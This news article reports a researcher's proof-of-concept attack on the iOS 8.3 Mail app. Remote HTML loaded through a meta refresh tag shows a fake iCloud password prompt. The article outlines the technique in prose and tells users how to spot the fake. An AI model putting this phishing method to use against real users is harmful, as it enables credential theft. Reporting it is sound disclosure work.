A security researcher has published an attack code he
said makes it easy to steal the iCloud passwords of the people using the latest
version of Apple’s iOS.
The proof of concept attack exploits a flaw in Mail
app, which is the default e-mail app for iOS. Since version 8.3 has been
released in April, the e-mail app has failed to block incoming potentially
dangerous HTML codes. This trap occurs when a message is received and after
downloading a form from this remote server that looks very similar to the
original iCloud log-in prompts.
This bug allows remote HTML content to be loaded,
replacing the content of the original e-mail message,” a user with the GitHub
name jansoucek wrote in a readme file accompanying the exploit. “JavaScript is
disabled in this UIWebView, but it is still possible to build a functional
password ‘collector’ using simple HTML and CSS.
To bring down the suspicion that anything is
inappropriate, the mail can be programmed to show the password window only one
time, instead of showing it each time the fake message is viewed. To make it
look realistic as Apple’s authentic iOS prompt; it uses a feature which is
known as autofocus to hide the dialog field once a user clicks OK. All of this
is required to launch the vulnerability is an e-mail with the <meta
http-equiv=refresh> HTML tag sent to the target and a computer that is
hosting the fake login window. The image will then be embedded in the e-mail in
such a way that can easily fool anyone.
Experienced users can detect this fake password
window by pressing the home button when this message is displayed. Authentic
prompts are “modal,” which means they will not allow the user to do anything
else until and unless the OK or cancel buttons are touched. While the fake
prompt, is not modal. If you hit the home button while the prompt is displayed
and it returns you to the main screen then this prompt is a fake one and it
shouldn’t be trusted.
The researcher said he had reported this bug to Apple in January but
Apple has still not provided a fix; Apple is yet to give any comment on this
vulnerability.